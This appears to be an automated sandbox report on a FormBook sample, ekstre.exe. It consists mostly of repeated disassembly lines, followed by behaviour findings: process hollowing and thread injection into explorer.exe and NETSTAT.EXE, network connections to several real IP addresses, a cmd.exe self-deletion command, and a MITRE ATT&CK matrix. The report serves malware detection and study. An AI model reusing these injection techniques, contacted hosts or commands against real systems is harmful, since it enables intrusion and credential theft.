Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34195004 mov eax, dword ptr fs:[00000030h]	1_2_34195004
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34195004 mov ecx, dword ptr fs:[00000030h]	1_2_34195004
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34178009 mov eax, dword ptr fs:[00000030h]	1_2_34178009
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416D02D mov eax, dword ptr fs:[00000030h]	1_2_3416D02D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34219060 mov eax, dword ptr fs:[00000030h]	1_2_34219060
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34171051 mov eax, dword ptr fs:[00000030h]	1_2_34171051
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34171051 mov eax, dword ptr fs:[00000030h]	1_2_34171051
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A0044 mov eax, dword ptr fs:[00000030h]	1_2_341A0044
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F6040 mov eax, dword ptr fs:[00000030h]	1_2_341F6040
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34176074 mov eax, dword ptr fs:[00000030h]	1_2_34176074
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34176074 mov eax, dword ptr fs:[00000030h]	1_2_34176074
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34177072 mov eax, dword ptr fs:[00000030h]	1_2_34177072
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424505B mov eax, dword ptr fs:[00000030h]	1_2_3424505B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3421F0A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416A093 mov ecx, dword ptr fs:[00000030h]	1_2_3416A093
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416C090 mov eax, dword ptr fs:[00000030h]	1_2_3416C090
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422B0AF mov eax, dword ptr fs:[00000030h]	1_2_3422B0AF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F7090 mov eax, dword ptr fs:[00000030h]	1_2_341F7090
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342450B7 mov eax, dword ptr fs:[00000030h]	1_2_342450B7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244080 mov eax, dword ptr fs:[00000030h]	1_2_34244080
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34206090 mov eax, dword ptr fs:[00000030h]	1_2_34206090
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B00A5 mov eax, dword ptr fs:[00000030h]	1_2_341B00A5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F60A0 mov eax, dword ptr fs:[00000030h]	1_2_341F60A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3416B0D6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3416B0D6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3416B0D6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3416B0D6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418B0D0 mov eax, dword ptr fs:[00000030h]	1_2_3418B0D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416C0F6 mov eax, dword ptr fs:[00000030h]	1_2_3416C0F6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AD0F0 mov eax, dword ptr fs:[00000030h]	1_2_341AD0F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AD0F0 mov ecx, dword ptr fs:[00000030h]	1_2_341AD0F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341690F8 mov eax, dword ptr fs:[00000030h]	1_2_341690F8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341690F8 mov eax, dword ptr fs:[00000030h]	1_2_341690F8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341690F8 mov eax, dword ptr fs:[00000030h]	1_2_341690F8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341690F8 mov eax, dword ptr fs:[00000030h]	1_2_341690F8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC0E0 mov ecx, dword ptr fs:[00000030h]	1_2_341FC0E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A0118 mov eax, dword ptr fs:[00000030h]	1_2_341A0118
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113 mov eax, dword ptr fs:[00000030h]	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419510F mov eax, dword ptr fs:[00000030h]	1_2_3419510F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417510D mov eax, dword ptr fs:[00000030h]	1_2_3417510D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F13E mov eax, dword ptr fs:[00000030h]	1_2_3422F13E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FA130 mov eax, dword ptr fs:[00000030h]	1_2_341FA130
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A7128 mov eax, dword ptr fs:[00000030h]	1_2_341A7128
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A7128 mov eax, dword ptr fs:[00000030h]	1_2_341A7128
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A415F mov eax, dword ptr fs:[00000030h]	1_2_341A415F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416A147 mov eax, dword ptr fs:[00000030h]	1_2_3416A147
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416A147 mov eax, dword ptr fs:[00000030h]	1_2_3416A147
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416A147 mov eax, dword ptr fs:[00000030h]	1_2_3416A147
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341C717A mov eax, dword ptr fs:[00000030h]	1_2_341C717A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341C717A mov eax, dword ptr fs:[00000030h]	1_2_341C717A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3420314A mov eax, dword ptr fs:[00000030h]	1_2_3420314A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3420314A mov eax, dword ptr fs:[00000030h]	1_2_3420314A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3420314A mov eax, dword ptr fs:[00000030h]	1_2_3420314A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3420314A mov eax, dword ptr fs:[00000030h]	1_2_3420314A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34245149 mov eax, dword ptr fs:[00000030h]	1_2_34245149
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34176179 mov eax, dword ptr fs:[00000030h]	1_2_34176179
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34243157 mov eax, dword ptr fs:[00000030h]	1_2_34243157
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34243157 mov eax, dword ptr fs:[00000030h]	1_2_34243157
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34243157 mov eax, dword ptr fs:[00000030h]	1_2_34243157
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A716D mov eax, dword ptr fs:[00000030h]	1_2_341A716D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1190 mov eax, dword ptr fs:[00000030h]	1_2_341B1190
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1190 mov eax, dword ptr fs:[00000030h]	1_2_341B1190
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34199194 mov eax, dword ptr fs:[00000030h]	1_2_34199194
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342451B6 mov eax, dword ptr fs:[00000030h]	1_2_342451B6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34174180 mov eax, dword ptr fs:[00000030h]	1_2_34174180
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34174180 mov eax, dword ptr fs:[00000030h]	1_2_34174180
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34174180 mov eax, dword ptr fs:[00000030h]	1_2_34174180
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A41BB mov ecx, dword ptr fs:[00000030h]	1_2_341A41BB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A41BB mov eax, dword ptr fs:[00000030h]	1_2_341A41BB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A41BB mov eax, dword ptr fs:[00000030h]	1_2_341A41BB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A31BE mov eax, dword ptr fs:[00000030h]	1_2_341A31BE
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A31BE mov eax, dword ptr fs:[00000030h]	1_2_341A31BE
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE1A4 mov eax, dword ptr fs:[00000030h]	1_2_341AE1A4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE1A4 mov eax, dword ptr fs:[00000030h]	1_2_341AE1A4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342381EE mov eax, dword ptr fs:[00000030h]	1_2_342381EE
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342381EE mov eax, dword ptr fs:[00000030h]	1_2_342381EE
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341801C0 mov eax, dword ptr fs:[00000030h]	1_2_341801C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341801C0 mov eax, dword ptr fs:[00000030h]	1_2_341801C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341851C0 mov eax, dword ptr fs:[00000030h]	1_2_341851C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341851C0 mov eax, dword ptr fs:[00000030h]	1_2_341851C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341851C0 mov eax, dword ptr fs:[00000030h]	1_2_341851C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341851C0 mov eax, dword ptr fs:[00000030h]	1_2_341851C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341691F0 mov eax, dword ptr fs:[00000030h]	1_2_341691F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341691F0 mov eax, dword ptr fs:[00000030h]	1_2_341691F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341801F1 mov eax, dword ptr fs:[00000030h]	1_2_341801F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341801F1 mov eax, dword ptr fs:[00000030h]	1_2_341801F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341801F1 mov eax, dword ptr fs:[00000030h]	1_2_341801F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F1F0 mov eax, dword ptr fs:[00000030h]	1_2_3419F1F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F1F0 mov eax, dword ptr fs:[00000030h]	1_2_3419F1F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341791E5 mov eax, dword ptr fs:[00000030h]	1_2_341791E5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341791E5 mov eax, dword ptr fs:[00000030h]	1_2_341791E5
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3417A1E3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3417A1E3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3417A1E3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3417A1E3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3417A1E3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341681EB mov eax, dword ptr fs:[00000030h]	1_2_341681EB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FB214 mov eax, dword ptr fs:[00000030h]	1_2_341FB214
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FB214 mov eax, dword ptr fs:[00000030h]	1_2_341FB214
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416821B mov eax, dword ptr fs:[00000030h]	1_2_3416821B

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_00402F0C GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,

0_2_00402F0C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 122.201.64.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.179.237.158 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.27.72.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\ekstre.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 590000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre.exe	Thread register set: target process: 4940	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Thread register set: target process: 4940	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 4940	Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"			Jump to behavior

Source: explorer.exe, 00000002.00000000.1073012012.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5845843863.0000000000D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.1078864729.0000000004350000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000CEE8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CEE8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1073012012.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5845843863.0000000000D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1073012012.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5845843863.0000000000D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1070966849.0000000000489000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5837946878.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1ProgmanH

Source: C:\Users\user\Desktop\ekstre.exe

0_2_00403390

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 System Network Connections Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 Windows Service	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	12 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Windows Service	1 Software Packing	Security Account Manager	3 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	512 Process Injection	1 DLL Side-Loading	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rootkit	LSA Secrets	12 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	512 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
